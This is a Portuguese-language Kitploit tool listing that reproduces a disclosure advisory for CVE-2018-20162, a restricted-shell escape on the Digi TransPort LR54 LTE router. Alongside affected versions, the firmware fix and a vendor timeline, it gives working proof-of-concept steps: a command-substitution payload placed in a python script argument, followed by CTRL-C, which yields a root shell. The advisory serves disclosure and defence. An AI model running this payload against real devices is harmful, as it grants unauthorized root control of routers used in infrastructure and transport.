Skip to content
KitploitKITPLOIT
FerramentasBlog
Enviar
FerramentasBlog
Enviar

Ferramentas de Hacking, PenTest e Cibersegurança para o seu Arsenal de Segurança!

Kitploit é um diretório de ferramentas de hacking, cibersegurança e pentesting. Descubra as últimas atualizações de projetos para encontrar vulnerabilidades, analisar sistemas, automatizar testes e fortalecer sua segurança.

··Feeds·Contato·Privacidade·© 2026 Kitploit

Diretório de Ferramentas

Categorias

Ver todas as categorias
Loading categories
CVE-2018-20162-digi-lr54-restricted-shell-escape — Exploit de prova de conceito para CVE-2018-20162: escape de sandbox no roteador LTE Digi TransPort LR54 através de falha no tratamento de SIGINT, concedendo acesso ao shell root. | Kitploit
Ferramentas/GitHubGitHub/stigtsp/cve-2018-20162-digi-lr54-restricted-shell-escape
Segurança de Sistemas EmbarcadosEscalada de PrivilégiosSegurança IoTAnálise de VulnerabilidadesExploraçãoTestes de PenetraçãoSegurança de Hardware e IoTRed Teaming

Mais Populares

Ver todos →

Descubra as ferramentas mais usadas pela nossa comunidade.

Explore todas as ferramentas

Navegue pela nossa coleção de ferramentas

Ver todas as ferramentas →
Compartilhar
GitHub
stigtsp/cve-2018-20162-digi-lr54-restricted-shell-escape

CVE-2018-20162-digi-lr54-restricted-shell-escape

Exploit de prova de conceito para CVE-2018-20162: escape de sandbox no roteador LTE Digi TransPort LR54 através de falha no tratamento de SIGINT, concedendo acesso ao shell root.

Ver Repositório
24há 7 anosAinda não revisado

layout: post title: "CVE-2018-20162: Digi TransPort LR54 Restricted Shell Escape" author: sgo category: security

O Digi TransPort LR54 é um roteador LTE de alta velocidade comumente usado pela indústria, infraestrutura, varejo e transporte público.

Ele suporta a execução de scripts python em um sandbox restrito, e possui um shell personalizado acessível via SSH que está sujeito às mesmas restrições. O SO subjacente é, portanto, inacessível ao administrador.

Encontrei uma maneira de escapar do sandbox e obter um shell root explorando a forma como o CLI lida com argumentos de linha de comando ao executar scripts python:

Quando um processo python interativo recebe um SIGINT (através de CTRL-C), os argumentos para o script não são devidamente escapados quando passados para o manipulador de logging de erros do CLI interativo. Isso permite que um atacante execute comandos arbitrários como root.

Para explorar essa vulnerabilidade, um atacante precisa ter acesso CLI interativo com privilégios 'super'. Um usuário com esse nível de acesso é habilitado por padrão no dispositivo.

Vulneráveis

Digi Transport LR54 (e talvez produtos relacionados como WR64 e WR54)

Firmware Version : 4.4.0.26 10/29/2018 21:14:06 Firmware Version : 4.3.2.24 09/06/2018 00:58:34

E talvez versões anteriores

Mitigação

Os usuários devem atualizar para a versão de firmware 4.5.1.4 ou mais recente. Segredos armazenados no dispositivo, como chaves privadas e frases secretas, devem ser alterados como precaução.

Prova de Conceito

  1. Faça upload de sleep.py para o LR54 usando scp ou sftp, contendo:
root@kitploit:~
import time;time.sleep(10)
  1. Execute o seguinte comando no CLI do LR54:
root@kitploit:~
python sleep.py --XXX $(/bin/sh -i >&2)
  1. Pressione imediatamente CTRL-C após o programa iniciar

  2. Você é então levado a um shell root interativo

root@kitploit:~
/home/digi/user # uname -a
Linux (none) 3.10.14 #1 SMP Mon Oct 29 16:18:10 CDT 2018 mips GNU/Linux
/home/digi/user # id
uid=0(root) gid=2000(users_rw) groups=2000(users_rw),2002(users_super)

Linha do Tempo

  • 2018-12-13: Vulnerabilidade descoberta
  • 2018-12-14: PoC criado, Fornecedor notificado
  • 2018-12-14: Fornecedor confirmou, embargo de 60 dias. Solicitado CVE.
  • 2018-12-15: CVE-2018-20162 atribuído
  • 2018-12-31: Recebido firmware de pré-lançamento. Confirmado não vulnerável.
  • 2019-01-02: Fornecedor lança firmware corrigido 4.5.1.4
  • 2019-01-25: Fornecedor atualizou notas de lançamento para referenciar CVE-2018-20162
  • 2019-02-13: Fornecedor autorizou divulgação, Embargo levantado

Referências

  • https://www.digi.com/products/networking/cellular-routers/digi-transport-lr54
  • http://ftp1.digi.com/support/firmware/transport/LR54/v4.5.1.4/93001306_L.pdf
  • https://www.digi.com/resources/security
  • https://blog.hackeriet.no/cve-2018-20162-digi-lr54-restricted-shell-escape
  • https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-20162

Créditos

Vulnerabilidade descoberta por Stig Palmquist.

Obrigado a @duniel_pls e @alexanderkjall por revisarem este relatório.

Baixar ferramenta